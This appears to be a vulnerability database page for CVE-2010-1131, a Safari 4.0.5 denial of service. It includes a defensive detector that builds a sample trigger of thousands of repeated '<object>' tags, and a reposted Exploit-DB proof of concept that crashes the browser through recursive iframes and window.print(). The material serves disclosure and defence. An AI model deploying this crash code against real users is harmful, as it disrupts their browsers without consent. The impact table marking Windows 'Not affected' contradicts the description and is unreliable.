CVE-2010-1131

Severity: medium
Published 2010-03-27 · Modified 2026-04-29
CVSS v3: —
CVSS v4: — (not yet in upstream)
VIR risk: 5.3

Description

JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the <object> substring.
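An added detection example, not part of the advisory and not from either Exploit-DB entry: a gateway- or proxy-side check for the trigger the description names, an HTML body containing a long run of successive `<object>` substrings. It treats "successive" as allowing only whitespace between occurrences, matches the bare `<object>` tag case-insensitively, and uses an illustrative cutoff of 1000; all three are assumptions, and the sample documents are constructed, not captured traffic.

```javascript
// Added example (not from the advisory or Exploit-DB): scan an HTML body for the
// trigger CVE-2010-1131 describes, a long run of successive "<object>" substrings.
// Assumptions: "successive" allows only whitespace between occurrences, the match
// is the bare "<object>" tag (case-insensitive), and RUN_THRESHOLD is an
// illustrative cutoff, not a value taken from the advisory.
const RUN_THRESHOLD = 1000;

// Length of the longest chain of "<object>" substrings in html where consecutive
// occurrences are separated by nothing but whitespace.
function longestObjectRun(html) {
  const tag = /<object\s*>/gi;
  let longest = 0;
  let current = 0;
  let prevEnd = -1;
  let m;
  while ((m = tag.exec(html)) !== null) {
    // Adjacent if everything between the previous tag and this one is whitespace.
    const adjacent = prevEnd >= 0 && html.slice(prevEnd, m.index).trim() === '';
    current = adjacent ? current + 1 : 1;
    prevEnd = m.index + m[0].length;
    if (current > longest) longest = current;
  }
  return longest;
}

// Verdict for a fetched document: suspicious once the longest run reaches the threshold.
function scanHtml(html, threshold = RUN_THRESHOLD) {
  const longestRun = longestObjectRun(html);
  return { longestRun, suspicious: longestRun >= threshold };
}

// Constructed sample inputs (not captured traffic). The benign page uses <object>
// the way real content does: isolated tags with attributes and content between them.
const BENIGN_HTML =
  '<html><body><object data="clip.swf"></object><p>text</p>' +
  '<object></object></body></html>';
// The trigger shape from the description: thousands of "<object>" back to back.
const TRIGGER_HTML = '<html><body>' + '<object>'.repeat(5000) + '</body></html>';

console.log('benign :', scanHtml(BENIGN_HTML));
console.log('trigger:', scanHtml(TRIGGER_HTML));
```

The check is deliberately a substring scan rather than a DOM parse, because the description attributes the crash to the raw `<object>` substring rather than to well-formed elements; a document built to trigger it need not parse cleanly, so a parser-based check could miss it.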

Predictions

Exploit likelihood: 20%
Patch ETA: —

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12487 · dos · windows · text · 1 KB
Mathias Karlsson · 2010-05-03

Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion

Source: Exploit-DB
<html>
<!--
Crash Report

  Problem Event Name:   APPCRASH
  Application Name:     Safari.exe
  Application Version:  5.31.22.7
  Application Timestamp:        4b8f94fa
  Fault Module Name:    JavaScriptCore.dll
  Fault Module Version: 5.31.22.5
  Fault Module Timestamp:       4b8cb88c
  Exception Code:       c00000fd
  Exception Offset:     000889f7
  OS Version:   6.1.7600.2.0.0.256.48
  Locale ID:    1053
  Additional Information 1:     d4bb
  Additional Information 2:     d4bb5342a8501f1ef1ad79845414ed25
  Additional Information 3:     57f4
  Additional Information 4:     57f4717a3dd18c61a213b49009cb5bb7

Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/

Note:
If you set the iframe src property to an external document containing the window.print() call, the user does not have to dismiss the first print popup.
-->
<body>
<script>
// Exception code 0xC00000FD is STATUS_STACK_OVERFLOW: the document embeds itself
// in ever-deeper nested iframes until the renderer's stack is exhausted.
window.print();
a();
function a()
{
        setInterval(b,0);
}
function b()
{
        // Each new iframe loads this same document, which runs a() again inside it.
        var c = document.createElement("iframe");
        c.setAttribute("src",document.location);
        document.getElementsByTagName("body")[0].appendChild(c);
        setInterval(a,0);
}
</script>
</body>
</html>
EDB-11838 · dos · windows · verified
3lkt3F0k4 · 2010-03-22

Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)

OS impact

OS       Version  Status        Fixed in
Windows  —        Not affected  —

Application impact

Vendor  Product  Versions  Fixed
apple   safari   4.0.5     —
